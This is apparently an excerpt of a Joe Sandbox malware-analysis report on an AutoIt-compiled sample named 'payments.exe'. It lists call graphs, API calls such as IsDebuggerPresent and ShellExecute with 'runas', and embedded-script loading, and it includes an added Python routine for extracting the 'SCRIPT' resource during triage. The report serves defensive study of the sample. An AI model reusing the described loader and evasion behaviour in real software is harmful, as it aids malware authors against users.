95048->95831 95051 ceea54 95052 ca45e0 334 API calls 95051->95052 95052->95059 95053 ceea84 95054 c9936c 81 API calls 95053->95054 95053->95059 95055 ceea9f 95054->95055 95832 c9bc74 48 API calls 95055->95832 95057 ceeaaf 95058 ca3200 334 API calls 95057->95058 95058->95059 95059->94888 95060->94889 95062 c96b0f 48 API calls 95061->95062 95080 c9b495 95062->95080 95063 c9b69b 95092 c9ba85 48 API calls _memcpy_s 95063->95092 95065 c9b6b5 Mailbox 95065->94964 95068 d0397b 95096 cd26bc 88 API calls 4 library calls 95068->95096 95069 c9ba85 48 API calls 95069->95080 95072 c9b9e4 95098 cd26bc 88 API calls 4 library calls 95072->95098 95073 d03973 95073->95065 95076 d03989 95097 c9ba85 48 API calls _memcpy_s 95076->95097 95077 c9bcce 48 API calls 95077->95080 95079 d03909 95082 c96b4a 48 API calls 95079->95082 95080->95063 95080->95068 95080->95069 95080->95072 95080->95077 95080->95079 95081 c9bb85 48 API calls 95080->95081 95085 c9bdfa 48 API calls 95080->95085 95088 d03939 _memcpy_s 95080->95088 95090 c9c413 59 API calls 95080->95090 95091 c9bc74 48 API calls 95080->95091 95093 c9c6a5 49 API calls 95080->95093 95094 c9c799 48 API calls _memcpy_s 95080->95094 95081->95080 95083 d03914 95082->95083 95087 caf4ea 48 API calls 95083->95087 95086 c9b66c CharUpperBuffW 95085->95086 95086->95080 95087->95088 95095 cd26bc 88 API calls 4 library calls 95088->95095 95089->94968 95090->95080 95091->95080 95092->95065 95093->95080 95094->95080 95095->95073 95096->95076 95097->95073 95098->95073 95100 cd6529 95099->95100 95101 cd6cc4 FindFirstFileW 95099->95101 95100->94889 95101->95100 95102 cd6cd9 FindClose 95101->95102 95102->95100 95104 cb35f0 __lseeki64 95103->95104 95105 cb361c 95104->95105 95106 cb3604 95104->95106 95112 cb3614 __lseeki64 95105->95112 95116 cb4e1c 95105->95116 95138 cb7c0e 47 API calls __getptd_noexit 95106->95138 95109 cb3609 95139 cb6e10 8 API calls __woutput_l 95109->95139 95112->94977 95117 cb4e4e EnterCriticalSection 95116->95117 95118 cb4e2c 
95116->95118 95119 cb362e 95117->95119 95118->95117 95120 cb4e34 95118->95120 95122 cb3578 95119->95122 95141 cb7cf4 95120->95141 95123 cb359b 95122->95123 95124 cb3587 95122->95124 95130 cb3597 95123->95130 95186 cb2c84 95123->95186 95226 cb7c0e 47 API calls __getptd_noexit 95124->95226 95126 cb358c 95227 cb6e10 8 API calls __woutput_l 95126->95227 95140 cb3653 LeaveCriticalSection LeaveCriticalSection _fprintf 95130->95140 95134 cb35b5 95203 cbe9d2 95134->95203 95136 cb35bb 95136->95130 95137 cb1c9d _free 47 API calls 95136->95137 95137->95130 95138->95109 95139->95112 95140->95112 95142 cb7d18 EnterCriticalSection 95141->95142 95143 cb7d05 95141->95143 95142->95119 95148 cb7d7c 95143->95148 95145 cb7d0b 95145->95142 95172 cb115b 47 API calls 3 library calls 95145->95172 95149 cb7d88 __lseeki64 95148->95149 95150 cb7da9 95149->95150 95151 cb7d91 95149->95151 95158 cb7e11 __lseeki64 95150->95158 95165 cb7da7 95150->95165 95173 cb81c2 47 API calls __NMSG_WRITE 95151->95173 95153 cb7d96 95174 cb821f 47 API calls 7 library calls 95153->95174 95156 cb7dbd 95159 cb7dd3 95156->95159 95160 cb7dc4 95156->95160 95157 cb7d9d 95175 cb1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95157->95175 95158->95145 95161 cb7cf4 __lock 46 API calls 95159->95161 95177 cb7c0e 47 API calls __getptd_noexit 95160->95177 95164 cb7dda 95161->95164 95167 cb7de9 InitializeCriticalSectionAndSpinCount 95164->95167 95168 cb7dfe 95164->95168 95165->95150 95176 cb69d0 47 API calls __malloc_crt 95165->95176 95166 cb7dc9 95166->95158 95169 cb7e04 95167->95169 95178 cb1c9d 95168->95178 95184 cb7e1a LeaveCriticalSection _doexit 95169->95184 95173->95153 95174->95157 95176->95156 95177->95166 95179 cb1ccf _free 95178->95179 95180 cb1ca6 RtlFreeHeap 95178->95180 95179->95169 95180->95179 95181 cb1cbb 95180->95181 95185 cb7c0e 47 API calls __getptd_noexit 95181->95185 95183 cb1cc1 GetLastError 95183->95179 95184->95158 95185->95183 95187 cb2cbb 95186->95187 95188 cb2c97 
95186->95188 95192 cbeb36 95187->95192 95188->95187 95189 cb2933 __ftell_nolock 47 API calls 95188->95189 95190 cb2cb4 95189->95190 95228 cbaf61 95190->95228 95193 cb35af 95192->95193 95194 cbeb43 95192->95194 95196 cb2933 95193->95196 95194->95193 95195 cb1c9d _free 47 API calls 95194->95195 95195->95193 95197 cb293d 95196->95197 95198 cb2952 95196->95198 95365 cb7c0e 47 API calls __getptd_noexit 95197->95365 95198->95134 95200 cb2942 95366 cb6e10 8 API calls __woutput_l 95200->95366 95202 cb294d 95202->95134 95204 cbe9de __lseeki64 95203->95204 95205 cbe9e6 95204->95205 95208 cbe9fe 95204->95208 95382 cb7bda 47 API calls __getptd_noexit 95205->95382 95207 cbea7b 95386 cb7bda 47 API calls __getptd_noexit 95207->95386 95208->95207 95213 cbea28 95208->95213 95209 cbe9eb 95383 cb7c0e 47 API calls __getptd_noexit 95209->95383 95212 cbea80 95387 cb7c0e 47 API calls __getptd_noexit 95212->95387 95215 cba8ed ___lock_fhandle 49 API calls 95213->95215 95217 cbea2e 95215->95217 95216 cbea88 95388 cb6e10 8 API calls __woutput_l 95216->95388 95219 cbea4c 95217->95219 95220 cbea41 95217->95220 95384 cb7c0e 47 API calls __getptd_noexit 95219->95384 95367 cbea9c 95220->95367 95221 cbe9f3 __lseeki64 95221->95136 95224 cbea47 95385 cbea73 LeaveCriticalSection __unlock_fhandle 95224->95385 95226->95126 95227->95130 95229 cbaf6d __lseeki64 95228->95229 95230 cbaf75 95229->95230 95235 cbaf8d 95229->95235 95326 cb7bda 47 API calls __getptd_noexit 95230->95326 95232 cbb022 95331 cb7bda 47 API calls __getptd_noexit 95232->95331 95233 cbaf7a 95327 cb7c0e 47 API calls __getptd_noexit 95233->95327 95235->95232 95238 cbafbf 95235->95238 95237 cbb027 95332 cb7c0e 47 API calls __getptd_noexit 95237->95332 95253 cba8ed 95238->95253 95241 cbb02f 95333 cb6e10 8 API calls __woutput_l 95241->95333 95242 cbafc5 95244 cbafeb 95242->95244 95245 cbafd8 95242->95245 95328 cb7c0e 47 API calls __getptd_noexit 95244->95328 95262 cbb043 95245->95262 95247 cbaf82 __lseeki64 95247->95187 95249 cbaff0 95329 

                                                                                                                          Control-flow Graph
                                                                                                                          • Function at 0x00CBB043 (graph edge list omitted). API calls on its paths: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7dbd2c33a069467e017bd4dd66a375ea98f0549e501aaced77a9418bf70693fb
                                                                                                                          • Instruction ID: 02936df5ee99692e4727017f093366c05bdbe7654a4e05ce2c1332bcf5e1051e
                                                                                                                          • Opcode Fuzzy Hash: 7dbd2c33a069467e017bd4dd66a375ea98f0549e501aaced77a9418bf70693fb
                                                                                                                          • Instruction Fuzzy Hash: 37325C75B022288FDB248F15DC81AE9B7B5FF4A310F1841D9E81AE7A91D7709E81CF52

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C93AA3,?), ref: 00C93D45
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00C93AA3,?), ref: 00C93D57
                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,,00D51130,?,?,?,?,00C93AA3,?), ref: 00C93DC8
                                                                                                                            • Part of subcall function 00C96430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C93DEE,,?,?,?,?,?,00C93AA3,?), ref: 00C96471
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,00C93AA3,?), ref: 00C93E48
                                                                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D428F4,00000010), ref: 00D01CCE
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,,?,?,?,?,?,00C93AA3,?), ref: 00D01D06
                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D2DAB4,,?,?,?,?,?,00C93AA3,?), ref: 00D01D89
                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,00C93AA3), ref: 00D01D90
                                                                                                                            • Part of subcall function 00C93E6E: GetSysColorBrush.USER32(0000000F), ref: 00C93E79
                                                                                                                            • Part of subcall function 00C93E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00C93E88
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(00000063), ref: 00C93E9E
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(000000A4), ref: 00C93EB0
                                                                                                                            • Part of subcall function 00C93E6E: LoadIconW.USER32(000000A2), ref: 00C93EC2
                                                                                                                            • Part of subcall function 00C93E6E: RegisterClassExW.USER32(?), ref: 00C93F30
                                                                                                                            • Part of subcall function 00C936B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C936E6
                                                                                                                            • Part of subcall function 00C936B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C93707
                                                                                                                            • Part of subcall function 00C936B8: ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C9371B
                                                                                                                            • Part of subcall function 00C936B8: ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C93724
                                                                                                                            • Part of subcall function 00C94FFC: _memset.LIBCMT ref: 00C95022
                                                                                                                            • Part of subcall function 00C94FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C950CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas$
                                                                                                                          • API String ID: 438480954-2314413276
                                                                                                                          • Opcode ID: 7cf4a1b65675e7b1efe62a96237dd90059f74e1e903ff43585746dc48f091c4f
                                                                                                                          • Instruction ID: 25604137253aac22eebb52c826ab066ca0b3eb59244ca553bf009b9750c4a27e
                                                                                                                          • Opcode Fuzzy Hash: 7cf4a1b65675e7b1efe62a96237dd90059f74e1e903ff43585746dc48f091c4f
                                                                                                                          • Instruction Fuzzy Hash: 48511535A04788BECF02ABF4DC49FEE7B769B15741F0040A4F912A22D2DB744A0ADB31

                                                                                                                          Control-flow Graph
                                                                                                                          • Function at 0x00CADDC0 (graph edge list omitted; the APIs on its paths are listed below).
                                                                                                                          APIs
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00CADDEC
                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00D2DC38,?,?), ref: 00CADEAC
                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?,00D2DC38,?,?), ref: 00CADF01
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CADF0C
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CADF1F
                                                                                                                          • GetSystemInfo.KERNEL32(?,00D2DC38,?,?), ref: 00CADF29
                                                                                                                          • GetSystemInfo.KERNEL32(?,00D2DC38,?,?), ref: 00CADF35
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3851250370-0
                                                                                                                          • Opcode ID: 597ab79bddffcb3e948f93d9357df31ec8daae01da868c4de178dfabf386dc61
                                                                                                                          • Instruction ID: 1cf932803b0443f5c7a2c584ffda8b1b3608ce33af06f2a869064e7eaf7e31f4
                                                                                                                          • Opcode Fuzzy Hash: 597ab79bddffcb3e948f93d9357df31ec8daae01da868c4de178dfabf386dc61
                                                                                                                          • Instruction Fuzzy Hash: 6A61D57180A385DFCF15CFA898C41EABFB46F3A304B1985D9D84A9F247C634CA49CB65

                                                                                                                          Control-flow Graph
                                                                                                                          • Function at 0x00C9406B (graph edge list omitted): CreateStreamOnHGlobal, then FindResourceExW, LoadResource, SizeofResource and LockResource in sequence; the APIs are listed below.
                                                                                                                          APIs
                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C9449E,?,?,00000000,00000001), ref: 00C9407B
                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C9449E,?,?,00000000,00000001), ref: 00C94092
                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB), ref: 00D04F1A
                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB), ref: 00D04F2F
                                                                                                                          • LockResource.KERNEL32(00C9449E,?,?,00C9449E,?,?,00000000,00000001,?,?,?,?,?,?,00C941FB,00000000), ref: 00D04F42
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                          • String ID: SCRIPT
                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                          • Opcode ID: 45c2da25344d33cbf25fe9c3157953a9530f273bca33c9c4eaf0a94eb68c6b0a
                                                                                                                          • Instruction ID: 37be629dc8f5e0aa42a81ebefc63534681b057ffa269ca06335ba7315e97282e
                                                                                                                          • Opcode Fuzzy Hash: 45c2da25344d33cbf25fe9c3157953a9530f273bca33c9c4eaf0a94eb68c6b0a
                                                                                                                          • Instruction Fuzzy Hash: 51111871200701BFEB258B65ED4CF677BBAEBC5B51F14816DB616D62A0DB71DC028A30
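The five calls above (FindResourceExW with type 0x0000000A, i.e. RT_RCDATA, and the name "SCRIPT", then LoadResource / SizeofResource / LockResource, with the result wrapped in a stream by CreateStreamOnHGlobal) are how the loader pulls the compiled script out of its own image. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it performs the same lookup statically on a raw .rsrc section, walking the three-level resource directory (type, name, language) as the PE format lays it out, and returns the bytes the data entry points to. The .rsrc bytes it runs on are constructed by build_rsrc() for the demo and the payload is a placeholder, not a real AutoIt script; the structure layout follows the documented IMAGE_RESOURCE_DIRECTORY / _DIRECTORY_ENTRY / _DIR_STRING_U / _DATA_ENTRY formats.

```python
import struct

RT_RCDATA = 10            # the 0x0000000A type argument in the FindResourceExW call above
SUBDIR_FLAG = 0x80000000  # high bit of OffsetToData: entry points to another directory
NAME_FLAG = 0x80000000    # high bit of Name: entry is named (offset of IMAGE_RESOURCE_DIR_STRING_U)


def _dir_string(blob, off):
    """IMAGE_RESOURCE_DIR_STRING_U: uint16 length in UTF-16 code units, then the chars."""
    (n,) = struct.unpack_from("<H", blob, off)
    return blob[off + 2:off + 2 + 2 * n].decode("utf-16-le")


def _entries(blob, dir_off):
    """Yield (key, raw_offset) for each IMAGE_RESOURCE_DIRECTORY_ENTRY of one directory.

    key is a str for named entries and an int ID otherwise; raw_offset keeps the
    subdirectory flag so the caller can tell directories from data entries."""
    named, ids = struct.unpack_from("<HH", blob, dir_off + 12)   # NumberOfNamedEntries, NumberOfIdEntries
    for i in range(named + ids):
        name, off = struct.unpack_from("<II", blob, dir_off + 16 + 8 * i)
        if name & NAME_FLAG:
            yield _dir_string(blob, name & 0x7FFFFFFF), off
        else:
            yield name, off


def _lookup(blob, dir_off, key):
    """Find key (int ID or str name; names compare case-insensitively) in one directory level."""
    for k, off in _entries(blob, dir_off):
        if isinstance(k, str) and isinstance(key, str):
            if k.lower() == key.lower():
                return off
        elif k == key:
            return off
    raise KeyError(key)


def find_resource(rsrc, rsrc_rva, res_type, res_name, lang=0):
    """Static equivalent of FindResourceExW + LoadResource + SizeofResource + LockResource.

    rsrc is the raw .rsrc section and rsrc_rva its RVA: IMAGE_RESOURCE_DATA_ENTRY
    stores the data location as an RVA, not as an offset into the section."""
    off = _lookup(rsrc, 0, res_type)                      # level 1: type
    if not off & SUBDIR_FLAG:
        raise ValueError("type entry must be a subdirectory")
    off = _lookup(rsrc, off & 0x7FFFFFFF, res_name)       # level 2: name or ID
    if not off & SUBDIR_FLAG:
        raise ValueError("name entry must be a subdirectory")
    off = _lookup(rsrc, off & 0x7FFFFFFF, lang)           # level 3: language
    if off & SUBDIR_FLAG:
        raise ValueError("language entry must be a data entry")
    data_rva, size, _codepage, _reserved = struct.unpack_from("<IIII", rsrc, off)
    start = data_rva - rsrc_rva
    if start < 0 or start + size > len(rsrc):             # malformed tree: do not slice blindly
        raise ValueError("data entry points outside the .rsrc section")
    return rsrc[start:start + size]


def has_resource(rsrc, rsrc_rva, res_type, res_name, lang=0):
    """True if the lookup succeeds, False on a missing entry or a malformed tree."""
    try:
        find_resource(rsrc, rsrc_rva, res_type, res_name, lang)
        return True
    except (KeyError, ValueError, struct.error):
        return False


def build_rsrc(rsrc_rva, payload, name="SCRIPT", lang=0):
    """Constructed .rsrc section with one RT_RCDATA resource: type -> name -> lang -> data.

    Fixed layout: root dir @0, type dir @24, name dir @48, data entry @72,
    name string @88, payload directly after the string."""
    def directory(named, ids, entries):
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, named, ids)   # IMAGE_RESOURCE_DIRECTORY (16 bytes)
        return hdr + b"".join(struct.pack("<II", n, o) for n, o in entries)

    name_u = name.encode("utf-16-le")
    string_off = 88
    data_off = string_off + 2 + len(name_u)
    root = directory(0, 1, [(RT_RCDATA, SUBDIR_FLAG | 24)])
    type_dir = directory(1, 0, [(NAME_FLAG | string_off, SUBDIR_FLAG | 48)])
    name_dir = directory(0, 1, [(lang, 72)])
    data_entry = struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0)
    dir_string = struct.pack("<H", len(name)) + name_u
    return root + type_dir + name_dir + data_entry + dir_string + payload


# Constructed sample: a .rsrc section mapped at RVA 0x30000 whose "SCRIPT" RCDATA
# resource holds a placeholder blob (NOT a real compiled AutoIt script).
SAMPLE_RVA = 0x30000
SAMPLE_PAYLOAD = b"placeholder compiled-script bytes"
SAMPLE_RSRC = build_rsrc(SAMPLE_RVA, SAMPLE_PAYLOAD)


def extract_script(rsrc=SAMPLE_RSRC, rsrc_rva=SAMPLE_RVA):
    """Same arguments the sample uses at 0x00C94092: RT_RCDATA, name "SCRIPT", language 0."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SCRIPT", 0)


if __name__ == "__main__":
    blob = extract_script()
    print(f"SCRIPT resource: {len(blob)} bytes, first 8: {blob[:8]!r}")
```

On a real dump, feed find_resource() the raw .rsrc section and the RVA from its section header; the report excerpt does not show the section table of payments.exe, so no offsets are assumed here. The three structural checks matter for triage: the type and name levels must be subdirectories, the language level must be a data entry, and the data RVA must land inside the section, so a truncated or deliberately malformed resource tree raises instead of slicing garbage.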
                                                                                                                          APIs
                                                                                                                          • IsThemeActive.UXTHEME ref: 00C93A73
                                                                                                                            • Part of subcall function 00CB1405: __lock.LIBCMT ref: 00CB140B
                                                                                                                            • Part of subcall function 00C93ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C93AF3
                                                                                                                            • Part of subcall function 00C93ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C93B08
                                                                                                                            • Part of subcall function 00C93D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C93AA3,?), ref: 00C93D45
                                                                                                                            • Part of subcall function 00C93D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00C93AA3,?), ref: 00C93D57
                                                                                                                            • Part of subcall function 00C93D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,,00D51130,?,?,?,?,00C93AA3,?), ref: 00C93DC8
                                                                                                                            • Part of subcall function 00C93D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00C93AA3,?), ref: 00C93E48
                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C93AB3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                          • String ID: `>
                                                                                                                          • API String ID: 924797094-1004004633
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00D02F49), ref: 00CD6CB9
                                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00CD6CCA
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD6CDA
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 48322524-0
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8Throwstd::exception::exception
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3728558374-2766056989
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharUpper
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3964851224-0
                                                                                                                          APIs
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E959
                                                                                                                          • timeGetTime.WINMM ref: 00C9EBFA
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9ED2E
                                                                                                                          • TranslateMessage.USER32(?), ref: 00C9ED3F
                                                                                                                          • DispatchMessageW.USER32(?), ref: 00C9ED4A
                                                                                                                          • LockWindowUpdate.USER32(00000000), ref: 00C9ED79
                                                                                                                          • DestroyWindow.USER32 ref: 00C9ED85
                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C9ED9F
                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00D05270
                                                                                                                          • TranslateMessage.USER32(?), ref: 00D059F7
                                                                                                                          • DispatchMessageW.USER32(?), ref: 00D05A05
                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D05A19
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                          • API String ID: 2641332412-570651680
                                                                                                                          APIs
                                                                                                                          • ___createFile.LIBCMT ref: 00CC5EC3
                                                                                                                          • ___createFile.LIBCMT ref: 00CC5F04
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC5F2D
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC5F34
                                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC5F47
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC5F6A
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC5F73
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC5F7C
                                                                                                                          • __set_osfhnd.LIBCMT ref: 00CC5FAC
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC6016
                                                                                                                          • __close_nolock.LIBCMT ref: 00CC603C
                                                                                                                          • __chsize_nolock.LIBCMT ref: 00CC606C
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC607E
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC6176
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC618B
                                                                                                                          • __close_nolock.LIBCMT ref: 00CC61EB
                                                                                                                            • Part of subcall function 00CBEA9C: CloseHandle.KERNELBASE(00000000,00D3EEF4,00000000,?,00CC6041,00D3EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBEAEC
                                                                                                                            • Part of subcall function 00CBEA9C: GetLastError.KERNEL32(?,00CC6041,00D3EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBEAF6
                                                                                                                            • Part of subcall function 00CBEA9C: __free_osfhnd.LIBCMT ref: 00CBEB03
                                                                                                                            • Part of subcall function 00CBEA9C: __dosmaperr.LIBCMT ref: 00CBEB25
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC620D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6342
                                                                                                                          • ___createFile.LIBCMT ref: 00CC6361
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CC636E
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC6375
                                                                                                                          • __free_osfhnd.LIBCMT ref: 00CC6395
                                                                                                                          • __invoke_watson.LIBCMT ref: 00CC63C3
                                                                                                                          • __wsopen_helper.LIBCMT ref: 00CC63DD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                          • String ID: @
